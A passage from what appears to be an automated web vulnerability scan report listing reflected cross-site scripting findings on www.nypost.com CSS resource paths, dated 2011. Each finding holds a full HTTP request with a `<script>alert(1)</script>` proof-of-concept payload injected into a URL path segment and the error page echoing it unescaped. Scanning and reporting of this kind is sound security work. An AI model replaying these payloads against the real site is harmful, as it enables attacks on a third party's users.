The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a5b4a<script>alert(1)</script>720f93d37d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfiga5b4a<script>alert(1)</script>720f93d37d0/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 739
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:07 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfiga5b4a<script>alert(1)</script>720f93d37d0/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css</p>
...[SNIP]...

1.192. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1f621<script>alert(1)</script>e9834c5b54d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal1f621<script>alert(1)</script>e9834c5b54d/nypost/blocks/breaking_news_bar/breaking_news_bar.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 739
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:09 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal1f621<script>alert(1)</script>e9834c5b54d/nypost/blocks/breaking_news_bar/breaking_news_bar.css</p>
...[SNIP]...

1.193. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c85fd<script>alert(1)</script>b5f9d728c50 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostc85fd<script>alert(1)</script>b5f9d728c50/blocks/breaking_news_bar/breaking_news_bar.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 739
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:10 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostc85fd<script>alert(1)</script>b5f9d728c50/blocks/breaking_news_bar/breaking_news_bar.css</p>
...[SNIP]...

1.194. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 73d80<script>alert(1)</script>f874c57cf69 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks73d80<script>alert(1)</script>f874c57cf69/breaking_news_bar/breaking_news_bar.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 739
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:14 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks73d80<script>alert(1)</script>f874c57cf69/breaking_news_bar/breaking_news_bar.css</p>
...[SNIP]...

1.195. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4f36a<script>alert(1)</script>d8e3415c99f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar4f36a<script>alert(1)</script>d8e3415c99f/breaking_news_bar.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 739
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:16 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar4f36a<script>alert(1)</script>d8e3415c99f/breaking_news_bar.css</p>
...[SNIP]...

1.196. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 6d74f<script>alert(1)</script>4103bd751f4 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css6d74f<script>alert(1)</script>4103bd751f4 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 739
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:18 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css6d74f<script>alert(1)</script>4103bd751f4</p>
...[SNIP]...

1.197. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 88c89<script>alert(1)</script>690a4345437 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig88c89<script>alert(1)</script>690a4345437/WebPortal/nypost/blocks/btns/btns.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:39:55 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig88c89<script>alert(1)</script>690a4345437/WebPortal/nypost/blocks/btns/btns.css</p>
...[SNIP]...

1.198. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 98f73<script>alert(1)</script>9a7b5d8e3b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal98f73<script>alert(1)</script>9a7b5d8e3b3/nypost/blocks/btns/btns.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:00 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal98f73<script>alert(1)</script>9a7b5d8e3b3/nypost/blocks/btns/btns.css</p>
...[SNIP]...

1.199. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ce062<script>alert(1)</script>a6eac44dde was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostce062<script>alert(1)</script>a6eac44dde/blocks/btns/btns.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:02 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostce062<script>alert(1)</script>a6eac44dde/blocks/btns/btns.css</p>
...[SNIP]...

1.200. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a3920<script>alert(1)</script>d04ffc14596 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocksa3920<script>alert(1)</script>d04ffc14596/btns/btns.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:04 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocksa3920<script>alert(1)</script>d04ffc14596/btns/btns.css</p>
...[SNIP]...

1.201. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 26d00<script>alert(1)</script>aa71840f4bd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/btns26d00<script>alert(1)</script>aa71840f4bd/btns.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:07 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/btns26d00<script>alert(1)</script>aa71840f4bd/btns.css</p>
...[SNIP]...

1.202. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 42583<script>alert(1)</script>da97e745c86 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css42583<script>alert(1)</script>da97e745c86 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:09 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css42583<script>alert(1)</script>da97e745c86</p>
...[SNIP]...

1.203. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9270c<script>alert(1)</script>7f4bc085917 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig9270c<script>alert(1)</script>7f4bc085917/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 747
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:27 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig9270c<script>alert(1)</script>7f4bc085917/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css</p>
...[SNIP]...

1.204. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 65cda<script>alert(1)</script>376ac24913 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal65cda<script>alert(1)</script>376ac24913/nypost/blocks/classifieds_verticals/classifieds_verticals.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 746
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:32 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal65cda<script>alert(1)</script>376ac24913/nypost/blocks/classifieds_verticals/classifieds_verticals.css</p>
...[SNIP]...

1.205. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8c55<script>alert(1)</script>c4d72438687 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nyposta8c55<script>alert(1)</script>c4d72438687/blocks/classifieds_verticals/classifieds_verticals.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 747
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:34 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nyposta8c55<script>alert(1)</script>c4d72438687/blocks/classifieds_verticals/classifieds_verticals.css</p>
...[SNIP]...

1.206. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload eb930<script>alert(1)</script>a951160820c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blockseb930<script>alert(1)</script>a951160820c/classifieds_verticals/classifieds_verticals.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 747
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:39 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blockseb930<script>alert(1)</script>a951160820c/classifieds_verticals/classifieds_verticals.css</p>
...[SNIP]...

1.207. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9813d<script>alert(1)</script>624dd600ebd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals9813d<script>alert(1)</script>624dd600ebd/classifieds_verticals.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 747
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:41 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals9813d<script>alert(1)</script>624dd600ebd/classifieds_verticals.css</p>
...[SNIP]...

1.208. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 11eb5<script>alert(1)</script>240343d24bd was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css11eb5<script>alert(1)</script>240343d24bd HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 747
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:42 GMT
Connection: close

